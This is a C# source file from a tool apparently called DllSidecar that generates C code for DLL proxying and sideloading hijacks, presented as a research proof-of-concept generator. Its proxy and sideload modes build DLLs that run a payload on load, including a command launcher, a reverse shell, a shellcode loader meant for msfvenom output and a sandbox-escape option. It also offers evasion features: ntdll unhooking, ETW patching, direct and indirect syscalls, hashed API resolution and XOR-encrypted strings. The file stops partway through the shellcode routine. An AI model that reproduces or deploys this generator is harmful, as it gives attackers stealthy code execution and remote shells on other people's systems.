using System.Text;
using DllSidecar.Core.Models;
using DllSidecar.Core.Helpers;

namespace DllSidecar.Core.Services;

public static class TemplateEngine
{
    public static Dictionary<string, string> Generate(PeAnalysis analysis, TemplateConfig config)
    {
        return config.Mode switch
        {
            GenerationMode.Tracer => GenerateTracer(analysis, config),
            GenerationMode.Proxy => GenerateProxy(analysis, config),
            GenerationMode.Sideload => GenerateSideload(analysis, config),
            _ => throw new ArgumentException($"Unknown mode: {config.Mode}")
        };
    }

    /// <summary>
    /// Render the " — &lt;handle&gt;" attribution only when researcher is non-empty.
    /// </summary>
    private static string ResearcherAttribution(TemplateConfig config) =>
        string.IsNullOrWhiteSpace(config.Researcher) ? "" : $" — {config.Researcher}";

    public static Dictionary<string, string> GenerateTracer(PeAnalysis analysis, TemplateConfig config)
    {
        var exports = analysis.Exports;
        bool isX64 = analysis.Arch == "x64";
        string renamed = Path.GetFileNameWithoutExtension(analysis.Filename) + "_orig.dll";
        int numExports = exports.Count;

        var sb = new StringBuilder();

        // Includes
        sb.AppendLine("#include <windows.h>");
        sb.AppendLine("#include <stdio.h>");
        if (config.DInvoke) sb.AppendLine("#include \"dinvoke.h\"");
        if (config.EncryptStrings) sb.AppendLine("#include \"cryptor.h\"");
        if (config.UnhookNtdll) sb.AppendLine("#include \"unhook.h\"");
        if (config.PatchEtw)
        {
            sb.AppendLine($"#define H_ETWEVENTWRITE 0x{Djb2.Hash("EtwEventWrite"):X8}UL");
            sb.AppendLine("#include \"etw.h\"");
        }
        sb.AppendLine();

        // Header
        sb.AppendLine($"/* === DllSidecar ExportTracer === */");
        sb.AppendLine($"/* Target: {analysis.Filename} ({analysis.Arch}) */");
        sb.AppendLine($"/* Exports: {numExports} */");
        sb.AppendLine($"/* Generated by DllSidecar{ResearcherAttribution(config)} */");
        sb.AppendLine();

        // Globals
        if (config.EncryptStrings) sb.Append(EmitLongXorKeyGlobal(config.LongXorKey));
        sb.AppendLine("static HMODULE g_hOriginal = NULL;");
        sb.AppendLine($"void *g_orig_funcs[{numExports}];");
        sb.AppendLine("static HANDLE g_hLogFile = INVALID_HANDLE_VALUE;");
        sb.AppendLine($"static volatile LONG g_call_count[{numExports}] = {{0}};");
        sb.AppendLine();

        // Export names array
        sb.AppendLine($"static const char *g_export_names[{numExports}] = {{");
        sb.AppendLine("    " + string.Join(",\n    ", exports.Select(e => $"\"{e.DisplayName}\"")));
        sb.AppendLine("};");
        sb.AppendLine();

        // Tracer log callback
        sb.AppendLine("void __attribute__((used)) tracer_log(int index) {");
        sb.AppendLine($"    if (index < 0 || index >= {numExports}) return;");
        sb.AppendLine("    LONG count = InterlockedIncrement(&g_call_count[index]);");
        sb.AppendLine("    if (g_hLogFile != INVALID_HANDLE_VALUE) {");
        sb.AppendLine("        char buf[512];");
        sb.AppendLine("        DWORD written;");
        sb.AppendLine("        int len = wsprintfA(buf, \"[%04d] %-40s (calls: %ld)\\r\\n\",");
        sb.AppendLine("                            index, g_export_names[index], count);");
        sb.AppendLine("        WriteFile(g_hLogFile, buf, len, &written, NULL);");
        sb.AppendLine("    }");
        sb.AppendLine("}");
        sb.AppendLine();

        // Trampolines
        for (int i = 0; i < exports.Count; i++)
        {
            var label = $"tramp_{SafeLabel(exports[i].DisplayName)}";
            sb.AppendLine(isX64
                ? AsmTrampolineX64(i, label, "tracer_log")
                : AsmTrampolineX86(i, label, "tracer_log"));
        }

        // DllMain
        sb.AppendLine("BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {");
        sb.AppendLine("    if (fdwReason == DLL_PROCESS_ATTACH) {");
        sb.AppendLine("        DisableThreadLibraryCalls(hinstDLL);");
        if (config.UnhookNtdll) sb.AppendLine("        unhook_ntdll();");
        if (config.PatchEtw) sb.AppendLine("        patch_etw();");
        sb.Append(GenerateLoadOriginal(config, renamed, exports));
        sb.AppendLine("        g_hLogFile = CreateFileA(\"sidecar_trace.log\", GENERIC_WRITE,");
        sb.AppendLine("            FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);");
        sb.AppendLine("    } else if (fdwReason == DLL_PROCESS_DETACH) {");
        sb.AppendLine("        if (g_hLogFile != INVALID_HANDLE_VALUE) {");
        sb.AppendLine("            char buf[512]; DWORD written;");
        sb.AppendLine("            wsprintfA(buf, \"\\r\\n=== TRACE SUMMARY ===\\r\\n\");");
        sb.AppendLine("            WriteFile(g_hLogFile, buf, lstrlenA(buf), &written, NULL);");
        sb.AppendLine($"            for (int i = 0; i < {numExports}; i++) {{");
        sb.AppendLine("                if (g_call_count[i] > 0) {");
        sb.AppendLine("                    int len = wsprintfA(buf, \"[CALLED] %s (ordinal %d): %ld calls\\r\\n\",");
        sb.AppendLine("                        g_export_names[i], i, g_call_count[i]);");
        sb.AppendLine("                    WriteFile(g_hLogFile, buf, len, &written, NULL);");
        sb.AppendLine("                }");
        sb.AppendLine("            }");
        sb.AppendLine("            CloseHandle(g_hLogFile);");
        sb.AppendLine("        }");
        sb.AppendLine("        if (g_hOriginal) FreeLibrary(g_hOriginal);");
        sb.AppendLine("    }");
        sb.AppendLine("    return TRUE;");
        sb.AppendLine("}");

        var baseName = Path.GetFileNameWithoutExtension(analysis.Filename);
        var srcName = $"tracer_{baseName}";

        return new Dictionary<string, string>
        {
            [$"{srcName}.c"] = sb.ToString(),
            [$"{srcName}.def"] = GenerateDefFile(analysis, exports, true),
            ["build_tracer.bat"] = GenerateBuildBat(analysis, config, srcName, "tracer"),
        };
    }

    public static Dictionary<string, string> GenerateProxy(PeAnalysis analysis, TemplateConfig config)
    {
        var exports = analysis.Exports;
        // Guard so IndexOutOfRange becomes an ArgumentException.
        if (exports.Count == 0)
            throw new ArgumentException(
                "Proxy mode requires at least one export on the target DLL. Use Sideload mode for DLLs without exports (phantom case).",
                nameof(analysis));

        // No TargetExport: emit a pure .def forwarder. With TargetExport: trampoline variant.
        if (string.IsNullOrEmpty(config.TargetExport))
            return GenerateProxyPureForwarder(analysis, config);

        bool isX64 = analysis.Arch == "x64";
        string renamed = Path.GetFileNameWithoutExtension(analysis.Filename) + "_orig.dll";
        int numExports = exports.Count;

        // -1 = DllMain-only trigger. Otherwise both DllMain and the trampoline call payload_execute (once-guarded).
        int targetIdx = -1;
        if (config.TargetExport != null)
        {
            var idx = exports.FindIndex(e => e.Name == config.TargetExport);
            if (idx >= 0) targetIdx = idx;
        }

        var sb = new StringBuilder();

        // <winsock2.h> MUST precede <windows.h> to skip legacy winsock1 decls.
        if (config.Payload == PayloadType.ReverseShell)
        {
            sb.AppendLine("#define WIN32_LEAN_AND_MEAN");
            sb.AppendLine("#include <winsock2.h>");
            sb.AppendLine("#include <ws2tcpip.h>");
        }
        sb.AppendLine("#include <windows.h>");
        sb.AppendLine("#include <stdio.h>");
        if (config.Payload == PayloadType.SandboxEscape) sb.AppendLine("#include <tlhelp32.h>");
        if (config.DInvoke) sb.AppendLine("#include \"dinvoke.h\"");
        if (config.IndirectSyscalls) sb.AppendLine("#include \"syscalls_indirect.h\"");
        else if (config.DirectSyscalls) sb.AppendLine("#include \"syscalls.h\"");
        if (config.EncryptStrings) sb.AppendLine("#include \"cryptor.h\"");
        if (config.UnhookNtdll) sb.AppendLine("#include \"unhook.h\"");
        if (config.PatchEtw)
        {
            sb.AppendLine($"#define H_ETWEVENTWRITE 0x{Djb2.Hash("EtwEventWrite"):X8}UL");
            sb.AppendLine("#include \"etw.h\"");
        }
        if (config.Payload == PayloadType.ReverseShell && !config.DInvoke)
            EmitReverseShellTypedefs(sb);
        sb.AppendLine();

        // Header
        var triggerLabel = targetIdx >= 0
            ? $"DllMain + {exports[targetIdx].DisplayName} (idx {targetIdx})"
            : "DllMain (no export hook — default)";
        sb.AppendLine($"/* === DllSidecar ProxyDll === */");
        sb.AppendLine($"/* Target: {analysis.Filename} ({analysis.Arch}) */");
        sb.AppendLine($"/* Exports: {numExports} | Payload triggers: {triggerLabel} */");
        sb.AppendLine($"/* Thread mode: {config.Thread} | DInvoke: {config.DInvoke} | Encrypted: {config.EncryptStrings} */");
        sb.AppendLine($"/* Generated by DllSidecar{ResearcherAttribution(config)} */");
        sb.AppendLine();

        // Globals
        if (config.EncryptStrings) sb.Append(EmitLongXorKeyGlobal(config.LongXorKey));
        sb.AppendLine("static HMODULE g_hOriginal = NULL;");
        sb.AppendLine($"void *g_orig_funcs[{numExports}];");
        // Once-guard so payload runs exactly once.
        sb.AppendLine("static volatile LONG g_payload_fired = 0;");
        sb.AppendLine();

        // Payload
        sb.AppendLine(GeneratePayload(config, isX64));
        sb.AppendLine();

        // Payload trigger — guarded once. Safe to call from DllMain or trampolines.
        sb.AppendLine("void __attribute__((used)) payload_execute(int index) {");
        sb.AppendLine("    (void)index;");
        sb.AppendLine("    if (InterlockedCompareExchange(&g_payload_fired, 1, 0) != 0) return;");
        sb.Append(GeneratePayloadInvoke(config));
        sb.AppendLine("}");
        sb.AppendLine();

        // Nop stub
        sb.AppendLine("void __attribute__((used)) nop_stub(int index) {");
        sb.AppendLine("    (void)index;");
        sb.AppendLine("}");
        sb.AppendLine();

        // Trampolines
        for (int i = 0; i < exports.Count; i++)
        {
            var label = $"tramp_{SafeLabel(exports[i].DisplayName)}";
            var callback = i == targetIdx ? "payload_execute" : "nop_stub";
            sb.AppendLine(isX64
                ? AsmTrampolineX64(i, label, callback)
                : AsmTrampolineX86(i, label, callback));
        }

        // DllMain — loads original, resolves forwards, fires payload (default trigger).
        sb.AppendLine("BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {");
        sb.AppendLine("    if (fdwReason == DLL_PROCESS_ATTACH) {");
        sb.AppendLine("        DisableThreadLibraryCalls(hinstDLL);");
        if (config.UnhookNtdll) sb.AppendLine("        unhook_ntdll();");
        if (config.PatchEtw) sb.AppendLine("        patch_etw();");
        if (config.DelayMs > 0)
            sb.AppendLine(config.DInvoke ? $"        sc_delay({config.DelayMs});" : $"        Sleep({config.DelayMs});");
        if (config.AnySyscalls)
            sb.AppendLine("        sc_init();");
        sb.Append(GenerateLoadOriginal(config, renamed, exports));
        sb.AppendLine("        payload_execute(-1);");
        sb.AppendLine("    } else if (fdwReason == DLL_PROCESS_DETACH) {");
        sb.AppendLine("        if (g_hOriginal) FreeLibrary(g_hOriginal);");
        sb.AppendLine("    }");
        sb.AppendLine("    return TRUE;");
        sb.AppendLine("}");

        var baseName = Path.GetFileNameWithoutExtension(analysis.Filename);
        var srcName = $"proxy_{baseName}";

        return new Dictionary<string, string>
        {
            [$"{srcName}.c"] = sb.ToString(),
            [$"{srcName}.def"] = GenerateDefFile(analysis, exports, true),
            ["build_proxy.bat"] = GenerateBuildBat(analysis, config, srcName, "proxy"),
        };
    }

    /// <summary>
    /// Pure-forwarder Proxy: .def forwards every export to &lt;base&gt;_orig.&lt;name&gt;; DllMain fires payload once.
    /// </summary>
    private static Dictionary<string, string> GenerateProxyPureForwarder(PeAnalysis analysis, TemplateConfig config)
    {
        var exports = analysis.Exports;
        bool isX64 = analysis.Arch == "x64";

        var sb = new StringBuilder();
        // Canonical header order — winsock2.h MUST precede windows.h. See the
        // matching note in GenerateProxy for the full rationale.
        if (config.Payload == PayloadType.ReverseShell)
        {
            sb.AppendLine("#define WIN32_LEAN_AND_MEAN");
            sb.AppendLine("#include <winsock2.h>");
            sb.AppendLine("#include <ws2tcpip.h>");
        }
        sb.AppendLine("#include <windows.h>");
        sb.AppendLine("#include <stdio.h>");
        if (config.Payload == PayloadType.SandboxEscape) sb.AppendLine("#include <tlhelp32.h>");
        if (config.DInvoke) sb.AppendLine("#include \"dinvoke.h\"");
        if (config.IndirectSyscalls) sb.AppendLine("#include \"syscalls_indirect.h\"");
        else if (config.DirectSyscalls) sb.AppendLine("#include \"syscalls.h\"");
        if (config.EncryptStrings) sb.AppendLine("#include \"cryptor.h\"");
        if (config.UnhookNtdll) sb.AppendLine("#include \"unhook.h\"");
        if (config.PatchEtw)
        {
            sb.AppendLine($"#define H_ETWEVENTWRITE 0x{Djb2.Hash("EtwEventWrite"):X8}UL");
            sb.AppendLine("#include \"etw.h\"");
        }
        // Non-DInvoke ReverseShell needs WS2_32/CreateProcessA fn-pointer typedefs declared locally.
        if (config.Payload == PayloadType.ReverseShell && !config.DInvoke)
            EmitReverseShellTypedefs(sb);
        sb.AppendLine();

        sb.AppendLine($"/* === DllSidecar ProxyDll (pure-forwarder mode) === */");
        sb.AppendLine($"/* Target: {analysis.Filename} ({analysis.Arch}) */");
        sb.AppendLine($"/* Exports: {exports.Count} (all forwarded via .def to _orig.dll at load time) */");
        sb.AppendLine($"/* Thread mode: {config.Thread} | DInvoke: {config.DInvoke} | Encrypted: {config.EncryptStrings} */");
        sb.AppendLine($"/* Generated by DllSidecar{ResearcherAttribution(config)} */");
        sb.AppendLine();

        // Once-guard — DllMain is the sole trigger here, but keep the pattern for
        // symmetry with the trampoline variant (and safety under weird re-entrancy).
        if (config.EncryptStrings) sb.Append(EmitLongXorKeyGlobal(config.LongXorKey));
        sb.AppendLine("static volatile LONG g_payload_fired = 0;");
        sb.AppendLine();

        sb.AppendLine(GeneratePayload(config, isX64));
        sb.AppendLine();

        sb.AppendLine("void __attribute__((used)) payload_execute(int index) {");
        sb.AppendLine("    (void)index;");
        sb.AppendLine("    if (InterlockedCompareExchange(&g_payload_fired, 1, 0) != 0) return;");
        sb.Append(GeneratePayloadInvoke(config));
        sb.AppendLine("}");
        sb.AppendLine();

        sb.AppendLine("BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {");
        sb.AppendLine("    if (fdwReason == DLL_PROCESS_ATTACH) {");
        sb.AppendLine("        DisableThreadLibraryCalls(hinstDLL);");
        if (config.UnhookNtdll) sb.AppendLine("        unhook_ntdll();");
        if (config.PatchEtw) sb.AppendLine("        patch_etw();");
        if (config.DelayMs > 0)
            sb.AppendLine(config.DInvoke ? $"        sc_delay({config.DelayMs});" : $"        Sleep({config.DelayMs});");
        if (config.AnySyscalls)
            sb.AppendLine("        sc_init();");
        sb.AppendLine("        payload_execute(-1);");
        sb.AppendLine("    }");
        sb.AppendLine("    return TRUE;");
        sb.AppendLine("}");

        var baseName = Path.GetFileNameWithoutExtension(analysis.Filename);
        var srcName = $"proxy_{baseName}";
        var origBase = baseName + "_orig";

        return new Dictionary<string, string>
        {
            [$"{srcName}.c"] = sb.ToString(),
            [$"{srcName}.def"] = GenerateForwarderDefFile(analysis, exports, origBase),
            ["build_proxy.bat"] = GenerateBuildBat(analysis, config, srcName, "proxy"),
        };
    }

    /// <summary>
    /// .def forwarding every named export to &lt;origBase&gt;.dll (MinGW ld syntax). Ordinal-only exports are skipped.
    /// </summary>
    /// <summary>
    /// WS2_32 + kernel32 fn-pointer typedefs for non-DInvoke reverse-shell paths (DInvoke gets them from dinvoke.h).
    /// later `fn_WSAStartup pStartup = ...` casts fail to compile.
    /// </summary>
    private static void EmitReverseShellTypedefs(StringBuilder sb)
    {
        sb.AppendLine();
        sb.AppendLine("/* Reverse-shell function-pointer typedefs (no DInvoke). */");
        sb.AppendLine("typedef int     (WINAPI *fn_WSAStartup)(WORD, LPWSADATA);");
        sb.AppendLine("typedef SOCKET  (WINAPI *fn_WSASocketW)(int, int, int, LPVOID, GROUP, DWORD);");
        sb.AppendLine("typedef int     (WINAPI *fn_connect)(SOCKET, const struct sockaddr*, int);");
        sb.AppendLine("typedef int     (WINAPI *fn_closesocket)(SOCKET);");
        sb.AppendLine("typedef BOOL    (WINAPI *fn_CreateProcessA)(LPCSTR, LPSTR, LPSECURITY_ATTRIBUTES,");
        sb.AppendLine("                    LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCSTR,");
        sb.AppendLine("                    LPSTARTUPINFOA, LPPROCESS_INFORMATION);");
    }

    private static string GenerateForwarderDefFile(PeAnalysis analysis, List<ExportEntry> exports, string origBase)
    {
        var sb = new StringBuilder();
        // No LIBRARY directive: DLL name comes from `-o filename.dll`.
        sb.AppendLine("EXPORTS");

        int skippedOrdinals = 0;
        foreach (var exp in exports)
        {
            if (exp.Name != null)
                sb.AppendLine($"    {exp.Name}={origBase}.{exp.Name}");
            else
                skippedOrdinals++;
        }

        if (skippedOrdinals > 0)
            sb.AppendLine($"; {skippedOrdinals} ordinal-only export(s) omitted — MinGW ld rejects DLL.#N forwarders.");

        return sb.ToString();
    }

    public static Dictionary<string, string> GenerateSideload(PeAnalysis analysis, TemplateConfig config)
    {
        var exports = analysis.Exports;
        bool isX64 = analysis.Arch == "x64";
        int numExports = exports.Count;

        var sb = new StringBuilder();

        // <winsock2.h> MUST precede <windows.h> to skip legacy winsock1 decls.
        if (config.Payload == PayloadType.ReverseShell)
        {
            sb.AppendLine("#define WIN32_LEAN_AND_MEAN");
            sb.AppendLine("#include <winsock2.h>");
            sb.AppendLine("#include <ws2tcpip.h>");
        }
        sb.AppendLine("#include <windows.h>");
        sb.AppendLine("#include <stdio.h>");
        if (config.Payload == PayloadType.SandboxEscape) sb.AppendLine("#include <tlhelp32.h>");
        if (config.DInvoke) sb.AppendLine("#include \"dinvoke.h\"");
        if (config.IndirectSyscalls) sb.AppendLine("#include \"syscalls_indirect.h\"");
        else if (config.DirectSyscalls) sb.AppendLine("#include \"syscalls.h\"");
        if (config.EncryptStrings) sb.AppendLine("#include \"cryptor.h\"");
        if (config.UnhookNtdll) sb.AppendLine("#include \"unhook.h\"");
        if (config.PatchEtw)
        {
            sb.AppendLine($"#define H_ETWEVENTWRITE 0x{Djb2.Hash("EtwEventWrite"):X8}UL");
            sb.AppendLine("#include \"etw.h\"");
        }
        if (config.Payload == PayloadType.ReverseShell && !config.DInvoke)
            EmitReverseShellTypedefs(sb);
        sb.AppendLine();

        sb.AppendLine($"/* === DllSidecar SideloadDll (stub mode) === */");
        sb.AppendLine($"/* Target: {analysis.Filename} ({analysis.Arch}) */");
        sb.AppendLine($"/* Exports: {numExports} (all stubs) */");
        sb.AppendLine($"/* Generated by DllSidecar{ResearcherAttribution(config)} */");
        sb.AppendLine();

        if (config.EncryptStrings) sb.Append(EmitLongXorKeyGlobal(config.LongXorKey));

        // Payload
        sb.AppendLine(GeneratePayload(config, isX64));
        sb.AppendLine();

        // Stub exports
        for (int i = 0; i < exports.Count; i++)
        {
            var label = $"stub_{SafeLabel(exports[i].DisplayName)}";
            if (isX64)
                sb.AppendLine($"void {label}(void) {{ }}");
            else
                sb.AppendLine($"void __stdcall {label}(void) {{ }}");
        }
        sb.AppendLine();

        // DllMain
        sb.AppendLine("BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {");
        sb.AppendLine("    if (fdwReason == DLL_PROCESS_ATTACH) {");
        sb.AppendLine("        DisableThreadLibraryCalls(hinstDLL);");
        if (config.UnhookNtdll) sb.AppendLine("        unhook_ntdll();");
        if (config.PatchEtw) sb.AppendLine("        patch_etw();");
        if (config.DelayMs > 0)
            sb.AppendLine(config.DInvoke ? $"        sc_delay({config.DelayMs});" : $"        Sleep({config.DelayMs});");
        if (config.AnySyscalls)
            sb.AppendLine("        sc_init();");

        // Payload invoke (one-shot)
        if (config.Thread == ThreadMode.Calling)
            sb.AppendLine("        do_payload();");
        else if (config.Thread == ThreadMode.Std)
            sb.AppendLine("        CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)do_payload, NULL, 0, NULL);");
        else if (config.AnySyscalls)
        {
            sb.AppendLine("        HANDLE hThread = NULL;");
            sb.AppendLine("        sc_NtCreateThreadEx(&hThread, THREAD_ALL_ACCESS, NULL,");
            sb.AppendLine("            (HANDLE)-1, (PVOID)do_payload, NULL, 0, 0, 0, 0, NULL);");
        }
        else
            sb.AppendLine("        CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)do_payload, NULL, 0, NULL);");

        sb.AppendLine("    }");
        sb.AppendLine("    return TRUE;");
        sb.AppendLine("}");

        var baseName = Path.GetFileNameWithoutExtension(analysis.Filename);
        var srcName = $"sideload_{baseName}";

        // Def file with stubs — no LIBRARY directive (see GenerateForwarderDefFile).
        var defSb = new StringBuilder();
        defSb.AppendLine("EXPORTS");
        for (int i = 0; i < exports.Count; i++)
        {
            var label = $"stub_{SafeLabel(exports[i].DisplayName)}";
            if (exports[i].Name != null)
                defSb.AppendLine($"    {exports[i].Name} = {label} @{exports[i].Ordinal}");
            else
                defSb.AppendLine($"    ord_{exports[i].Ordinal} = {label} @{exports[i].Ordinal} NONAME");
        }

        return new Dictionary<string, string>
        {
            [$"{srcName}.c"] = sb.ToString(),
            [$"{srcName}.def"] = defSb.ToString(),
            ["build_sideload.bat"] = GenerateBuildBat(analysis, config, srcName, "sideload"),
        };
    }

    // ── Private helpers ──

    private static string SafeLabel(string name)
        => name.Replace("@", "_at_").Replace("?", "_q_").Replace("$", "_d_");

    private static string AsmTrampolineX64(int index, string label, string callback)
    {
        int offset = index * 8;
        return $"__attribute__((naked)) void {label}(void) {{\n"
             + "    __asm__ (\n"
             + "        \"push %rax\\n\"\n"
             + "        \"push %rcx\\n\"\n"
             + "        \"push %rdx\\n\"\n"
             + "        \"push %r8\\n\"\n"
             + "        \"push %r9\\n\"\n"
             + "        \"push %r10\\n\"\n"
             + "        \"push %r11\\n\"\n"
             + "        \"sub $0x28, %rsp\\n\"\n"
             + $"        \"mov ${index}, %ecx\\n\"\n"
             + $"        \"call {callback}\\n\"\n"
             + "        \"add $0x28, %rsp\\n\"\n"
             + "        \"pop %r11\\n\"\n"
             + "        \"pop %r10\\n\"\n"
             + "        \"pop %r9\\n\"\n"
             + "        \"pop %r8\\n\"\n"
             + "        \"pop %rdx\\n\"\n"
             + "        \"pop %rcx\\n\"\n"
             + "        \"pop %rax\\n\"\n"
             + "        \"lea g_orig_funcs(%rip), %r11\\n\"\n"
             + $"        \"jmp *{offset}(%r11)\\n\"\n"
             + "    );\n"
             + "}\n";
    }

    private static string AsmTrampolineX86(int index, string label, string callback)
    {
        int offset = index * 4;
        return $"__attribute__((naked)) void {label}(void) {{\n"
             + "    __asm__ (\n"
             + "        \"pusha\\n\"\n"
             + "        \"pushf\\n\"\n"
             + $"        \"push ${index}\\n\"\n"
             + $"        \"call _{callback}\\n\"\n"
             + "        \"add $4, %esp\\n\"\n"
             + "        \"popf\\n\"\n"
             + "        \"popa\\n\"\n"
             + $"        \"jmp *(_g_orig_funcs + {offset})\\n\"\n"
             + "    );\n"
             + "}\n";
    }

    private static string GenerateEncryptedString(string value, string varName, byte[] key)
    {
        var enc = XorCryptor.Encrypt(value, key);
        var hexBytes = XorCryptor.ToHexArray(enc);
        return $"        static unsigned char enc_{varName}[] = {{{hexBytes}}};\n"
             + $"        char {varName}[{value.Length + 1}];\n"
             + $"        xor_decrypt_to(enc_{varName}, {varName}, {value.Length}, g_xkey, sizeof(g_xkey));\n";
    }

    // File-scope multi-byte XOR key (referenced by every xor_decrypt_to callsite).
    // frequency analysis on the encrypted .rdata blobs.
    private static string EmitLongXorKeyGlobal(byte[] key)
    {
        var hex = XorCryptor.ToHexArray(key);
        return $"static const unsigned char g_xkey[{key.Length}] = {{{hex}}};\n";
    }

    private static string GenerateLoadOriginal(TemplateConfig config, string renamed, List<ExportEntry> exports)
    {
        var sb = new StringBuilder();

        // Load DLL
        if (config.DInvoke && config.EncryptStrings)
        {
            sb.Append(GenerateEncryptedString(renamed, "dll_name", config.LongXorKey));
            sb.AppendLine("        g_hOriginal = dinvoke_load_module(dll_name);");
            sb.AppendLine("        PVOID hOrigMod = (PVOID)g_hOriginal;");
        }
        else if (config.DInvoke)
        {
            sb.AppendLine($"        g_hOriginal = dinvoke_load_module(\"{renamed}\");");
            sb.AppendLine("        PVOID hOrigMod = (PVOID)g_hOriginal;");
        }
        else if (config.EncryptStrings)
        {
            sb.Append(GenerateEncryptedString(renamed, "dll_name", config.LongXorKey));
            sb.AppendLine("        g_hOriginal = LoadLibraryA(dll_name);");
        }
        else
        {
            sb.AppendLine($"        g_hOriginal = LoadLibraryA(\"{renamed}\");");
        }
        sb.AppendLine("        if (!g_hOriginal) return FALSE;");

        // Resolve exports
        for (int i = 0; i < exports.Count; i++)
        {
            if (exports[i].Name is { } expName)
            {
                if (config.DInvoke)
                {
                    var h = Djb2.Hash(expName);
                    sb.AppendLine($"        g_orig_funcs[{i}] = (void *)dinvoke_get_proc(hOrigMod, 0x{h:X8}UL);");
                }
                else
                {
                    sb.AppendLine($"        g_orig_funcs[{i}] = (void *)GetProcAddress(g_hOriginal, \"{expName}\");");
                }
            }
            else
            {
                sb.AppendLine($"        g_orig_funcs[{i}] = (void *)GetProcAddress(g_hOriginal, (LPCSTR)MAKEINTRESOURCEA({exports[i].Ordinal}));");
            }
        }

        return sb.ToString();
    }

    private static string GeneratePayload(TemplateConfig config, bool isX64)
    {
        var cmd = string.IsNullOrEmpty(config.PayloadData) ? "cmd.exe" : config.PayloadData;
        var r = config.Researcher;

        if (config.Payload == PayloadType.Shellcode)
            return GenerateShellcodePayload(config);

        if (config.Payload == PayloadType.SandboxEscape)
            return GenerateSandboxEscapePayload(config);

        if (config.Payload == PayloadType.ReverseShell)
            return GenerateReverseShellPayload(config);

        // Proof file marker in %TEMP% for headless / non-interactive desktops.
        var proof = config.WriteProofFile ? GenerateProofFileSnippet() : "";

        // CreateProcessA with lpDesktop = WinSta0\Default + CREATE_NEW_CONSOLE for visibility.
        if (config.Payload == PayloadType.Command)
            return "static void do_payload(void) {\n"
                 + proof
                 + "    STARTUPINFOA si; ZeroMemory(&si, sizeof(si));\n"
                 + "    si.cb = sizeof(si);\n"
                 + "    si.lpDesktop = (LPSTR)\"WinSta0\\\\Default\";\n"
                 + "    si.dwFlags = STARTF_USESHOWWINDOW;\n"
                 + "    si.wShowWindow = SW_SHOW;\n"
                 + "    PROCESS_INFORMATION pi; ZeroMemory(&pi, sizeof(pi));\n"
                 + $"    CHAR cmdline[] = \"{cmd}\";\n"
                 + "    if (CreateProcessA(NULL, cmdline, NULL, NULL, FALSE,\n"
                 + "                       CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) {\n"
                 + "        CloseHandle(pi.hProcess);\n"
                 + "        CloseHandle(pi.hThread);\n"
                 + "    }\n"
                 + "}\n";

        // MessageBox payload: substitute {Researcher} then C-string-escape.
        var msgBody = CEscapeForLiteral(
            (config.MessageBoxBody ?? "").Replace("{Researcher}", r));
        var msgTitle = CEscapeForLiteral(
            (config.MessageBoxTitle ?? "").Replace("{Researcher}", r));
        if (string.IsNullOrEmpty(msgBody)) msgBody = "DLL Sideloading PoC";
        if (string.IsNullOrEmpty(msgTitle)) msgTitle = "DllSidecar PoC";

        if (config.Payload == PayloadType.MessageBox && config.DInvoke)
            return "static void do_payload(void) {\n"
                 + proof
                 + "    fn_LoadLibraryA pLLA = DINVOKE(H_KERNEL32_DLL, H_LOADLIBRARYA, fn_LoadLibraryA);\n"
                 + "    if (!pLLA) return;\n"
                 + "    HMODULE hUser32 = pLLA(\"user32.dll\");\n"
                 + "    if (!hUser32) return;\n"
                 + "    fn_MessageBoxA pMB = (fn_MessageBoxA)dinvoke_get_proc(hUser32, H_MESSAGEBOXA);\n"
                 + "    if (!pMB) return;\n"
                 + $"    pMB(NULL, \"{msgBody}\",\n"
                 + $"        \"{msgTitle}\", MB_ICONWARNING | MB_OK);\n"
                 + "}\n";

        // MessageBox without DInvoke
        return "static void do_payload(void) {\n"
             + proof
             + $"    MessageBoxA(NULL, \"{msgBody}\",\n"
             + $"        \"{msgTitle}\", MB_ICONWARNING | MB_OK);\n"
             + "}\n";
    }

    /// <summary>
    /// Escape a runtime string for a C double-quoted literal. Backslash first to avoid double-escapes.
    /// </summary>
    private static string CEscapeForLiteral(string s) => s
        .Replace("\\", "\\\\")
        .Replace("\"", "\\\"")
        .Replace("\r\n", "\\n")
        .Replace("\n", "\\n")
        .Replace("\r", "\\n");

    /// <summary>
    /// C snippet writing a proof file to %TEMP%\dllsidecar_proof_&lt;pid&gt;.txt via msvcrt fopen/fprintf.
    /// </summary>
    private static string GenerateProofFileSnippet()
    {
        return "    {\n"
             + "        char _proof_path[MAX_PATH], _proof_temp[MAX_PATH];\n"
             + "        GetTempPathA(MAX_PATH, _proof_temp);\n"
             + "        wsprintfA(_proof_path, \"%sdllsidecar_proof_%lu.txt\", _proof_temp, GetCurrentProcessId());\n"
             + "        FILE *_f = fopen(_proof_path, \"w\");\n"
             + "        if (_f) {\n"
             + "            SYSTEMTIME _st; GetLocalTime(&_st);\n"
             + "            fprintf(_f, \"DllSidecar PoC — payload fired\\n\"\n"
             + "                        \"PID: %lu\\n\"\n"
             + "                        \"Timestamp: %04d-%02d-%02d %02d:%02d:%02d\\n\",\n"
             + "                GetCurrentProcessId(), _st.wYear, _st.wMonth, _st.wDay,\n"
             + "                _st.wHour, _st.wMinute, _st.wSecond);\n"
             + "            fclose(_f);\n"
             + "        }\n"
             + "    }\n";
    }

    private static string GenerateShellcodePayload(TemplateConfig config)
    {
        var scHex = string.IsNullOrEmpty(config.PayloadData)
            ? new string('9', 32) + "CC"
            : config.PayloadData;
        var scBytes = string.Join(", ",
            Enumerable.Range(0, scHex.Length / 2).Select(i => $"0x{scHex.Substring(i * 2, 2)}"));
        int scLen = scHex.Length / 2;

        // Pattern: alloc RW, copy, flip to RX, run on fresh thread (fire-and-forget). Pair with msfvenom EXITFUNC=thread.
        if (config.AnySyscalls)
            return "static void do_payload(void) {\n"
                 + $"    unsigned char sc[] = {{{scBytes}}};\n"
                 + $"    PVOID mem = NULL; SIZE_T sz = {scLen}; ULONG old;\n"
